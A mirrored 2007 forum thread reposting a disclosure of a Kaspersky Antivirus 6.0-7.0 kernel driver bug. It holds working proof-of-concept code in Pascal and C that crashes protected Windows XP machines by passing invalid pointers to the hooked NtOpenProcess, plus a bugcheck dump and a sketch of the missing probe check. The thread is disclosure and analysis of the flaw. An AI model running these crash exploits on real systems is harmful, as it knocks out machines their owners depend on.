This is a mirrored post. Source: 北邮人论坛 / security / #11781, synced on 2007/6/11.

Exploiting Kaspersky Antivirus 6.0-7.0

flyingkisser
2007/6/11 · mirror sync · 2 replies
It is said this can be used for local privilege escalation; this kind of mistake should not be made.

-------------------------------------------------

Exploiting Kaspersky Antivirus 6.0-7.0
By: EP_X0FF

Exploiting Kaspersky Antivirus 6.0-7.0

The reason we decided to post this material on rootkit.com is simple: the well-known and really good Kaspersky Antivirus has suffered for a very long time from a very dangerous bug, which can be used as an exploit to crash a system protected by this antivirus, even from the Guest account. All attempts to inform Kaspersky Lab about this vulnerability were ignored. This material was posted some years ago, and last summer we posted a new exploit for Kaspersky AV 6.0 which was based on the security hole previously discovered by Ms-Rem. Nothing was changed. Even now, with the upcoming Kaspersky Antivirus 7.0, this exploit works very well.

The main goal of this exploit is calling NtOpenProcess with invalid parameters. This function is hooked by the Kaspersky driver called klif.sys, and the reason for its interception is obvious: this was done to protect Kaspersky AV from unauthorized access and from being closed by malware. Here is the prototype of this function:

    NTSYSAPI NTSTATUS NTAPI NtOpenProcess(
        OUT PHANDLE ProcessHandle,
        IN ACCESS_MASK DesiredAccess,
        IN POBJECT_ATTRIBUTES ObjectAttributes,
        IN PCLIENT_ID ClientId OPTIONAL
    );

Here is a small exploit coded in Pascal (worked well with klif.sys version 6.12.10.280 and previous versions):

    var
      ob1: OBJECT_ATTRIBUTES;
      p1: DWORD;
    begin
      ob1.Length := sizeof(ob1);
      NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
    end;

As you see, the last parameter is the address of the CLIENT_ID structure, and it points to an invalid random memory region in the kernel. After starting this exploit on a clean Windows XP without KAV, no BSOD appears. After starting this exploit on Windows XP protected by KAV 7.0, we immediately get a BSOD: PAGE_FAULT_IN_NONPAGED_AREA.

Why did this happen? Very simple explanation. The source of the hook on NtOpenProcess, I guess, looks like this:

    NTSTATUS NewNtOpenProcess(
        OUT PHANDLE ProcessHandle,
        IN ACCESS_MASK DesiredAccess,
        IN POBJECT_ATTRIBUTES ObjectAttributes,
        IN PCLIENT_ID ClientId OPTIONAL)
    {
        __try {
            if (ClientId->UniqueProcess == KasperskyProcess)
                return STATUS_ACCESS_DENIED;
            else
                return RealNtOpenProcess(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId);
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            ... stuff here ...
        }
    }

The biggest mistake here is ClientId->UniqueProcess, since ClientId is a POINTER to a structure. Accessing an invalid memory region immediately causes PAGE_FAULT_IN_NONPAGED_AREA. The original exploit was created by Ms-Rem and looks like:

    NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Now, as you see, the KAV developers have used a try/except block, but as this shows, they don't know about MmIsAddressValid. Hope now the developers of Kaspersky Antivirus will discover for themselves the wonderful program called NtCall and fix this bug.

    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: 83000000, memory referenced.
    Arg2: 00000000, value 0 = read operation, 1 = write operation.
    Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
        address.
    Arg4: 00000000, (reserved)

    Debugging Details:
    ------------------

    ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
    ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
    ***** Kernel symbols are WRONG. Please fix symbols to do analysis.
    ***** Kernel symbols are WRONG. Please fix symbols to do analysis.

    MODULE_NAME: klif
    FAULTING_MODULE: 804d7000 nt
    DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c
    READ_ADDRESS: unable to get nt!MmSpecialPoolStart
    unable to get nt!MmSpecialPoolEnd
    unable to get nt!MmPoolCodeStart
    unable to get nt!MmPoolCodeEnd
     83000000
    FAULTING_IP:
    klif+1940c
    f941840c 0fbe08           movsx   ecx,byte ptr [eax]
    MM_INTERNAL_CODE: 0
    CUSTOMER_CRASH_COUNT: 1
    DEFAULT_BUCKET_ID: WRONG_SYMBOLS
    BUGCHECK_STR: 0x50
    LAST_CONTROL_TRANSFER: from f941b39a to f941840c
    STACK_TEXT:
    WARNING: Stack unwind information not available. Following frames may be wrong.
    f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
    f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
    f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
    f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
    f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4
    STACK_COMMAND: kb
    FOLLOWUP_IP:
    klif+1940c
    f941840c 0fbe08           movsx   ecx,byte ptr [eax]
    SYMBOL_STACK_INDEX: 0
    FOLLOWUP_NAME: MachineOwner
    IMAGE_NAME: klif.sys
    SYMBOL_NAME: klif+1940c
    BUCKET_ID: WRONG_SYMBOLS
    Followup: MachineOwner

Kind Regards,
EP_X0FF/UG North
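As an added example (not code from the original post nor from klif.sys), here is a user-mode C model of the range check that ProbeForRead performs, which is the "Probe" the bugcheck text says must guard the ClientId pointer, applied to the pointer values that appear in this thread. It assumes 32-bit Windows XP without /3GB (MmUserProbeAddress = 0x7FFF0000) and an 8-byte CLIENT_ID.

```c
/* Added example, not code from the original post or from klif.sys: a user-mode
 * model of the range check that ProbeForRead performs. The bugcheck text says
 * the bad ClientId pointer "must be protected by a Probe"; this shows what that
 * probe rejects before any byte is read. Assumptions: 32-bit Windows XP without
 * /3GB, so MmUserProbeAddress is 0x7FFF0000, and CLIENT_ID is 8 bytes. */
#include <stdint.h>

#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0xC0000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u
#define MM_USER_PROBE_ADDRESS        0x7FFF0000u  /* assumed x86 XP value */

/* Model of ProbeForRead(Address, Length, Alignment). The real routine raises an
 * exception; the model returns the status that exception would carry. */
uint32_t probe_for_read_model(uint32_t address, uint32_t length, uint32_t alignment)
{
    if (length == 0)
        return STATUS_SUCCESS;
    if (address & (alignment - 1))
        return STATUS_DATATYPE_MISALIGNMENT;
    uint32_t end = address + length;          /* 32-bit wrap is detected below */
    if (end < address || end > MM_USER_PROBE_ADDRESS)
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* The check a hook needs before touching ClientId->UniqueProcess. ClientId is
 * OPTIONAL, so NULL passes; any other value must lie wholly in user space at
 * ULONG alignment. In a driver this probe (and a single copy of the structure
 * into a local) goes inside the __try block whenever ExGetPreviousMode() is
 * UserMode; the SEH handler alone cannot catch a fault on a kernel address. */
uint32_t probe_client_id(uint32_t client_id_address)
{
    const uint32_t client_id_size = 8;        /* two pointers on x86 */
    if (client_id_address == 0)
        return STATUS_SUCCESS;
    return probe_for_read_model(client_id_address, client_id_size, sizeof(uint32_t));
}
```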
2 replies
Mythology #1 · 2007/6/11
Do you mean that this program will bluescreen the machine? Scary as it is, it doesn't seem to do much real harm, does it?

    #include <windows.h>

    typedef DWORD (__stdcall * NTPROC)(DWORD handle, DWORD access, DWORD attr, DWORD id);

    int main()
    {
        HMODULE m = LoadLibrary("Ntdll.dll");
        if (m) {
            NTPROC open = (NTPROC)GetProcAddress(m, "NtOpenProcess");
            int ret = open(0, 0, 0, 0xFFFFFFFF);
            FreeLibrary(m);
        }
        return 0;
    }
flyingkisser #2 · 2007/6/11
Yeah, for now it's just a BSOD; how far it can actually be exploited would need reversing that .sys of theirs to find out. Kaspersky really is a bit arrogant though, treating the bugs everyone finds as noise; still, that's better than Rising's (瑞星) behaviour.

[Mythology (Night) wrote:]
: Do you mean that this program will bluescreen the machine?
: Scary as it is, it doesn't seem to do much real harm, does it?
: #include <windows.h>
: ...................